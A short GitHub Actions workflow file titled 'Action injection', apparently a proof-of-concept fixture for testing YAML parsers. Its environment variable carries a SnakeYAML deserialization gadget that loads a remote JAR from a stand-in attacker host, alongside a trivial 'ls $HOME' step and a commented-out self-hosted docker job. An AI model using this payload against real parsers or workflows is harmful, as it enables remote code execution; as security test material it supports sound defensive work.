name: Action injection

on: [ push ]

jobs:
    change-working-dir:
        runs-on: ubuntu-latest
        env:
          some_var: !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://attacker-server.tld/poc.jar"]]]]
        steps:
            - name: job_1
              run: |
                ls $HOME
    # invoke-docker:
    #     runs-on: self-hosted
    #     steps:
    #         - name: job_2
    #           run: |
    #               docker run --rm alpine:latest /bin/sh -c 'echo "something"'
